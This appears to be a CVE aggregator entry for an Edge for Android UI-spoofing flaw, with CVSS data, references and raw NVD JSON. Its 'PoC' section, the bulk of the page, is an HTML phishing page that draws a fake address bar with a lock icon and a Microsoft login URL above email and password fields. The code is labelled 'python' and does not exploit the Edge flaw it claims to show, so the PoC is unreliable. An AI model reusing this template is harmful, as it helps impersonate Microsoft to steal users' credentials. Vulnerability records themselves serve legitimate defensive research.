CVE-2026-33119

Description

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:edge:*:*:*:*:*:android:*:* - VULNERABLE

Microsoft Edge (Chromium-based) (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
  PoC for CVE-2026-33119: UI Spoofing in Microsoft Edge
  This demonstrates how to create a fake address bar using CSS.
-->
<!DOCTYPE html>
<html>
<head>
<style>
  body { margin: 0; padding: 0; font-family: sans-serif; }
  /* Container to position the fake bar */
  .spoof-container {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    z-index: 9999;
    background-color: #f3f3f3;
    border-bottom: 1px solid #dcdcdc;
    padding: 8px 15px;
    display: flex;
    align-items: center;
    box-shadow: 0 2px 4px rgba(0,0,0,0.1);
  }
  .fake-lock {
    color: green;
    margin-right: 8px;
    font-weight: bold;
  }
  .fake-url {
    color: #202124;
    flex-grow: 1;
    background: white;
    padding: 4px 10px;
    border-radius: 12px;
    border: 1px solid #ddd;
  }
  .content {
    margin-top: 60px; /* Push content below fake bar */
    padding: 20px;
    text-align: center;
  }
</style>
</head>
<body>
  <!-- Fake UI Element -->
  <div class="spoof-container">
    <span class="fake-lock">🔒</span>
    <div class="fake-url">https://www.login.microsoftonline.com</div>
  </div>

  <!-- Malicious Content -->
  <div class="content">
    <h2>Sign In</h2>
    <p>Please enter your credentials</p>
    <input type="text" placeholder="Email" style="width: 80%; padding: 10px;"><br><br>
    <input type="password" placeholder="Password" style="width: 80%; padding: 10px;"><br><br>
    <button>Log in</button>
  </div>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33119
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33119
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33119/
[4] VulDB https://vuldb.com/cve/CVE-2026-33119
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33119

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33119", "sourceIdentifier": "[email protected]", "published": "2026-04-10T22:16:21.287", "lastModified": "2026-04-14T11:57:14.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:edge:*:*:*:*:*:android:*:*", "versionEndExcluding": "147.0.3912.60", "matchCriteriaId": "4845F880-C10C-418A-9928-F40B0038B775"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33119", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}